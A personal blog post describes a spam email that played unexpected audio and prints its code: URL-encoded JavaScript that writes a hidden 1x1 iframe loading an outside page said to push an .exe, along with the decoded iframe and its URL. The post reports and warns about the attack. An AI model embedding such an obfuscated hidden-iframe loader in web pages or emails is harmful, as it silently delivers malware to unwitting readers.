Nasty audio spam

by Suw on

I just opened up my email this morning, after someone rang my mobile long enough to wake me (after a *really* bad night's sleep) but not long enough for me to get downstairs and answer (bastards) and was assaulted by two simultaneously playing 'news' reports.
Searched through my open apps – nothing should be making a sound. Searched through my open Firefox tabs – nope, nothing there either. Eventually closed Firefox and the nasty noise went away.
Thing is… there was a spam email in my inbox. I hadn't opened it. I can spot spam a mile off and it gets deleted on sight. But it was from 'news@capitalex.com' and had the subject 'news', so I figured that might be the perpetrator.
A closer looks reveals this code:

<Script Language='Javascript'>
<!–

document.write(unescape('
%3C%49%46%52%41%4D%45%20%77%69%64%74%68%3D%22%31%22%
20%68%65%69%67%68%74%3D%22%31%22%20%53%52%43%3D%22%68%
74%74%70%3A%2F%2F%77%77%77%2E%70%72%6F%66%6F%72%65%78%
74%72%61%64%65%2E%63%6F%6D%2F%69%6D%61%67%65%73%2F%6E%
65%77%65%78%2E%68%74%6D%6C%22%20%66%72%61%6D%65%42%6F%
72%64%65%72%3D%22%31%22%20%0D%0A%0D%0A%73%63%72%6F%6C%
6C%69%6E%67%3D%22%6E%6F%22%3E%3C%2F%49%46%52%41%4D%45%3E'));

//–>
</Script>

Which decodes to this:

<IFRAME width=”1″ height=”1″ SRC=”http://www.proforextrade.com/images/newex.html” frameBorder=”1″ scrolling=”no”></IFRAME>

I've removed the link, but that page then spawns a shed load of crap, including an .exe.
This is an obvious security flaw, and I've reported it to Gmail, so hopefully they'll take action immediately.
If anyone wants the email w. headers, let me know.

Comments on this entry are closed.

Previous post:

Next post: